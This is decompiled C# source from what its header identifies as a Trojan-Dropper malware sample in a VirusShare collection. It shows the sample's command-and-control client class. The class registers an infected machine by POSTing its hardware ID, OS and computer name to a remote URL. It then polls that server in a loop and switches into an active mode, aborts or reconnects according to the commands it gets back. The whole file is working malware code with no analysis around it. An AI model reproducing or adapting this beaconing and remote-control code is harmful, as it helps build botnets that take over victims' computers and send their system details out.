// Decompiled with JetBrains decompiler // Type: Poly._communicate // Assembly: Poly, Version=, Culture=neutral, PublicKeyToken=null // MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe using System; using System.Collections.Specialized; using System.Net; using System.Text; using System.Threading; namespace Poly { internal class _communicate : Base_Settings { private static int Return; private static NameValueCollection sendData; private static string url; private static string uA; public static event _communicate.ModeChangedHandler ModeChange; public override void Initialise() => this.registerClient(); public override void Run() => new Thread(new ThreadStart(this.listen)).Start(); public static void setReturn(int iReturn) => _communicate.Return = iReturn; private static void initRegistryData() { _communicate.sendData = new NameValueCollection(); _communicate.uA = Base_Settings.userAgent; _communicate.url = Base_Settings.httpURL; _communicate.sendData["hwid"] = Base_Settings.hwid; _communicate.sendData["mode"] = Base_Settings.mode.ToString(); _communicate.sendData["os"] = Base_Settings.os; _communicate.sendData["pc"] = Base_Settings.pcName; _communicate.sendData["status"] = Base_Settings.status; } private static void initTalkData() { _communicate.sendData = new NameValueCollection(); _communicate.sendData["mode"] = Base_Settings.mode.ToString(); _communicate.sendData["status"] = Base_Settings.status; _communicate.sendData["hwid"] = Base_Settings.hwid; _communicate.sendData["return"] = _communicate.Return.ToString(); } public void registerClient() { try { if (Base_Settings.mode == 0) { _communicate.initRegistryData(); _communicate.talk(); if (!(Base_Settings.response[0] == Base_Settings.hwid)) return; Base_Settings.captured = true; Base_Settings.mode = 1; Base_Settings.busy = false; } else _communicate.talk(); } catch (Exception ex) { Console.WriteLine("There was a problem with registering client\n Error: {0} \n^Handled by regClient", (object) ex.ToString()); } } public void listen() { int num = 0; Console.WriteLine("Listener Started"); while (true) { while (Base_Settings.busy) { Console.WriteLine("Stuck"); Thread.Sleep(Base_Settings.interval * 1000); } if (Base_Settings.captured) { Console.WriteLine("Captured"); _communicate.talk(); if (Base_Settings.response[0] != null && Base_Settings.response[0] != Base_Settings.hwid) { switch (Base_Settings.response[0]) { case "0": case "1": case "2": case "3": case "4": Console.WriteLine("Setting mode to 'Active'"); this.setMode(2); break; case "5": Console.WriteLine("ABORT ALL!"); Function.Abort(); Base_Settings.mode = 2; _communicate.setReturn(1); break; case "00": Console.WriteLine("Restart code processed"); this.restartConnection(); break; default: Console.WriteLine("No command detected"); Base_Settings.mode = 1; break; } } else if (Base_Settings.response[0] == Base_Settings.hwid) { Base_Settings.status = "Idle"; Console.WriteLine("Neutral"); } else { Base_Settings.status = "Inactive"; Console.WriteLine("Idling hoHum..."); } Console.WriteLine("Status = {0}", (object) Base_Settings.status); } else if (Base_Settings.captured) { _communicate.talk(); } else { Console.WriteLine("Client not registered. Attmepting to register"); this.restartConnection(); ++num; } Thread.Sleep(Base_Settings.interval * 1000); } } private static void talk() { Base_Settings.busy = true; if (Base_Settings.mode != 0) { _communicate.initTalkData(); Console.WriteLine("Send data return = {0}", (object) _communicate.sendData["return"]); Console.WriteLine("Current mode = {0}", (object) Base_Settings.mode); } try { WebClient webClient = new WebClient(); webClient.Headers.Add("user-agent", _communicate.uA); string str = Encoding.UTF8.GetString(webClient.UploadValues(_communicate.url, "POST", _communicate.sendData)); string[] strArray = str.Split('|'); Base_Settings.response = str.Split('|'); Base_Settings.command = strArray[0]; Console.WriteLine(Base_Settings.command); webClient.Dispose(); } catch (Exception ex) { Console.WriteLine("There was an error with Talking.\n Error: {0}\n ^Handled by talk", (object) ex.ToString()); } Base_Settings.busy = false; } public void restartConnection() { Console.WriteLine("Restart code processed. Calling registerClient()"); Base_Settings.busy = true; Base_Settings.mode = 0; this.registerClient(); Base_Settings.busy = false; } public static void forceTalk() => _communicate.talk(); protected void OnModeChange(object sender, EventArgs data) { if (_communicate.ModeChange == null) return; _communicate.ModeChange((object) this, data); } public void setMode(int i1) { Base_Settings.mode = i1; if (i1 != 2) return; this.OnModeChange((object) this, (EventArgs) new ModeChangedArgs()); } public delegate void ModeChangedHandler(object sender, EventArgs e); } }